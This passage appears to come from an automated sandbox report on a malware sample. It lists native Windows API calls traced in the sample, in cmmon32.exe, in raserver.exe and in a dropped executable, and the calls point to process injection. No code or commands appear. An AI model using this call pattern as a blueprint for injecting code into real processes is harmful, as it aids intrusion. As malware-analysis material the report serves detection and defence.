          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA560 NtQuerySystemInformation,LdrInitializeThunk,2_2_201BA560
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA5F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_201BA5F0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA610 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_201BA610
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA6A0 NtCreateSection,LdrInitializeThunk,2_2_201BA6A0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA700 NtProtectVirtualMemory,LdrInitializeThunk,2_2_201BA700
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA720 NtResumeThread,LdrInitializeThunk,2_2_201BA720
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA750 NtCreateFile,LdrInitializeThunk,2_2_201BA750
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA800 NtSetValueKey,2_2_201BA800
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BB0B0 NtGetContextThread,2_2_201BB0B0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BBA30 NtSetContextThread,2_2_201BBA30
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA220 NtWaitForSingleObject,2_2_201BA220
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA260 NtWriteFile,2_2_201BA260
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA2F0 NtQueryInformationFile,2_2_201BA2F0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA310 NtEnumerateValueKey,2_2_201BA310
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA350 NtQueryValueKey,2_2_201BA350
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA370 NtQueryInformationProcess,2_2_201BA370
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA3D0 NtCreateKey,2_2_201BA3D0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BB410 NtOpenProcessToken,2_2_201BB410
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA430 NtQueryVirtualMemory,2_2_201BA430
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA470 NtSetInformationFile,2_2_201BA470
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BB470 NtOpenThread,2_2_201BB470
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA460 NtOpenProcess,2_2_201BA460
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BACE0 NtCreateMutant,2_2_201BACE0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA520 NtEnumerateKey,2_2_201BA520
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BBD40 NtSuspendThread,2_2_201BBD40
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA5A0 NtWriteVirtualMemory,2_2_201BA5A0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA650 NtQueueApcThread,2_2_201BA650
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA6D0 NtCreateProcessEx,2_2_201BA6D0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA710 NtQuerySection,2_2_201BA710
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA780 NtOpenDirectoryObject,2_2_201BA780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA800 NtSetValueKey,LdrInitializeThunk,4_2_00ECA800
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA2D0 NtClose,LdrInitializeThunk,4_2_00ECA2D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA260 NtWriteFile,LdrInitializeThunk,4_2_00ECA260
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA240 NtReadFile,LdrInitializeThunk,4_2_00ECA240
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA3E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_00ECA3E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA3D0 NtCreateKey,LdrInitializeThunk,4_2_00ECA3D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA360 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_00ECA360
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA350 NtQueryValueKey,LdrInitializeThunk,4_2_00ECA350
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA310 NtEnumerateValueKey,LdrInitializeThunk,4_2_00ECA310
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECACE0 NtCreateMutant,LdrInitializeThunk,4_2_00ECACE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA480 NtMapViewOfSection,LdrInitializeThunk,4_2_00ECA480
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA470 NtSetInformationFile,LdrInitializeThunk,4_2_00ECA470
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA410 NtQueryInformationToken,LdrInitializeThunk,4_2_00ECA410
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA560 NtQuerySystemInformation,LdrInitializeThunk,4_2_00ECA560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA540 NtDelayExecution,LdrInitializeThunk,4_2_00ECA540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA6A0 NtCreateSection,LdrInitializeThunk,4_2_00ECA6A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA610 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_00ECA610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA750 NtCreateFile,LdrInitializeThunk,4_2_00ECA750
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECB0B0 NtGetContextThread,4_2_00ECB0B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA2F0 NtQueryInformationFile,4_2_00ECA2F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA220 NtWaitForSingleObject,4_2_00ECA220
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECBA30 NtSetContextThread,4_2_00ECBA30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA370 NtQueryInformationProcess,4_2_00ECA370
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA4A0 NtUnmapViewOfSection,4_2_00ECA4A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA460 NtOpenProcess,4_2_00ECA460
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECB470 NtOpenThread,4_2_00ECB470
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA430 NtQueryVirtualMemory,4_2_00ECA430
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECB410 NtOpenProcessToken,4_2_00ECB410
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA5F0 NtReadVirtualMemory,4_2_00ECA5F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA5A0 NtWriteVirtualMemory,4_2_00ECA5A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECBD40 NtSuspendThread,4_2_00ECBD40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA520 NtEnumerateKey,4_2_00ECA520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA6D0 NtCreateProcessEx,4_2_00ECA6D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA650 NtQueueApcThread,4_2_00ECA650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA780 NtOpenDirectoryObject,4_2_00ECA780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA720 NtResumeThread,4_2_00ECA720
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA700 NtProtectVirtualMemory,4_2_00ECA700
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA710 NtQuerySection,4_2_00ECA710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00956BC0 NtCreateFile,4_2_00956BC0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00956CF0 NtClose,4_2_00956CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00956C70 NtReadFile,4_2_00956C70
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00956DA0 NtAllocateVirtualMemory,4_2_00956DA0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00956BBB NtCreateFile,4_2_00956BBB
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 17_2_03D71CF1 NtProtectVirtualMemory,17_2_03D71CF1
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A240 NtReadFile,LdrInitializeThunk,18_2_2026A240
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A2D0 NtClose,LdrInitializeThunk,18_2_2026A2D0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A360 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_2026A360
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A3E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_2026A3E0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A410 NtQueryInformationToken,LdrInitializeThunk,18_2_2026A410
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A4A0 NtUnmapViewOfSection,LdrInitializeThunk,18_2_2026A4A0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A480 NtMapViewOfSection,LdrInitializeThunk,18_2_2026A480
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A560 NtQuerySystemInformation,LdrInitializeThunk,18_2_2026A560
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A540 NtDelayExecution,LdrInitializeThunk,18_2_2026A540
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A5F0 NtReadVirtualMemory,LdrInitializeThunk,18_2_2026A5F0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A610 NtAdjustPrivilegesToken,LdrInitializeThunk,18_2_2026A610
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A6A0 NtCreateSection,LdrInitializeThunk,18_2_2026A6A0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A720 NtResumeThread,LdrInitializeThunk,18_2_2026A720
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A700 NtProtectVirtualMemory,LdrInitializeThunk,18_2_2026A700
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A750 NtCreateFile,LdrInitializeThunk,18_2_2026A750
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A800 NtSetValueKey,18_2_2026A800
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026B0B0 NtGetContextThread,18_2_2026B0B0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A220 NtWaitForSingleObject,18_2_2026A220
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026BA30 NtSetContextThread,18_2_2026BA30
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A260 NtWriteFile,18_2_2026A260
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A2F0 NtQueryInformationFile,18_2_2026A2F0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A310 NtEnumerateValueKey,18_2_2026A310
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A370 NtQueryInformationProcess,18_2_2026A370
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A350 NtQueryValueKey,18_2_2026A350
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A3D0 NtCreateKey,18_2_2026A3D0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A430 NtQueryVirtualMemory,18_2_2026A430
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026B410 NtOpenProcessToken,18_2_2026B410
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A460 NtOpenProcess,18_2_2026A460
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A470 NtSetInformationFile,18_2_2026A470
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026B470 NtOpenThread,18_2_2026B470
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026ACE0 NtCreateMutant,18_2_2026ACE0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A520 NtEnumerateKey,18_2_2026A520
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026BD40 NtSuspendThread,18_2_2026BD40
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A5A0 NtWriteVirtualMemory,18_2_2026A5A0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A650 NtQueueApcThread,18_2_2026A650
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A6D0 NtCreateProcessEx,18_2_2026A6D0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A710 NtQuerySection,18_2_2026A710
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A780 NtOpenDirectoryObject,18_2_2026A780
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434ACE0 NtCreateMutant,LdrInitializeThunk,19_2_0434ACE0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A560 NtQuerySystemInformation,LdrInitializeThunk,19_2_0434A560
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A610 NtAdjustPrivilegesToken,LdrInitializeThunk,19_2_0434A610
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A2D0 NtClose,LdrInitializeThunk,19_2_0434A2D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A360 NtAllocateVirtualMemory,LdrInitializeThunk,19_2_0434A360
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A3E0 NtFreeVirtualMemory,LdrInitializeThunk,19_2_0434A3E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A430 NtQueryVirtualMemory,19_2_0434A430
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434B410 NtOpenProcessToken,19_2_0434B410
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A410 NtQueryInformationToken,19_2_0434A410
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A470 NtSetInformationFile,19_2_0434A470
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434B470 NtOpenThread,19_2_0434B470
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A460 NtOpenProcess,19_2_0434A460
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A4A0 NtUnmapViewOfSection,19_2_0434A4A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A480 NtMapViewOfSection,19_2_0434A480
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A520 NtEnumerateKey,19_2_0434A520
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434BD40 NtSuspendThread,19_2_0434BD40
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A540 NtDelayExecution
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A5A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A5F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A650 NtQueueApcThread
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A6A0 NtCreateSection
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A6D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A720 NtResumeThread
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A710 NtQuerySection
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A700 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A750 NtCreateFile
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A780 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A800 NtSetValueKey
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434B0B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434BA30 NtSetContextThread
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A220 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A260 NtWriteFile
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A240 NtReadFile
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A2F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A310 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A370 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A350 NtQueryValueKey
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_0434A3D0 NtCreateKey
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_003B6BC0 NtCreateFile
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_003B6C70 NtReadFile
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_003B6CF0 NtClose
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_003B6DA0 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\raserver.exe, Code function: 19_2_003B6BBB NtCreateFile
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 0_2_03D513DE
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_0041B0EB
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_004078EE
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_004078F0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_0041B08A
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_0041A22E
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_0041ADD8
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_00419DF6
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_00419F63
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201A9810
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_2023D016
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201AE020
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201A0021
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201A1070
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_202218B6
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_2018A080
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_202428E8
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201A48CB
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201A7110
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201C9906
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201A594B
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_2024D9BE
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201A6180
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_202419E2
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_202361DF
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20230A02
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201A523D
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_2024E214
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201A4A5B
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201942B0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20241A99
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_202422DD
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_2019FB40
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201A4B96
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201A63C2
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_2017EBE0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_2022F42B
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20191410
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_2018740C
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201A547E
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20233490
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20241C9F
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20242C9A
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_202344EF
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_2023DCC5
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_2021C53F
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20191530
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20231D1B
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20242519
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20170D40
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_2023E581
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_2021E58A
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20221DE3
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_2023D5D2
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_2022FDDB
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201A6611
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_2023CE66
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20197640
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201A5E70
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_201A4E61
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20233E96
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_202426F8
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20241746
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20195790
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20232782
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exe, Code function: 2_2_20241FCE
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F528E8
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EB48CB
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F318B6
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00E9A080
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EB1070
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EBE020
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F4D016
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EB9810
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F519E2
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F461DF
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F5D9BE
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EB6180
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EB594B
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00ED9906
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EB7110
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F522DD
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EA42B0
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F51A99
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EB4A5B
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EB523D
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F5E214
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F40A02
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00E8EBE0
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EB63C2
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EB4B96
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EAFB40
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F444EF
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F4DCC5
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F43490
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F51C9F
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F52C9A
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EB547E
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F3F42B
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00E9740C
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00EA1410
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F31DE3
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F4D5D2
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F3FDDB
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F4E581
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F2E58A
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00E80D40
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4_2_00F2C53F
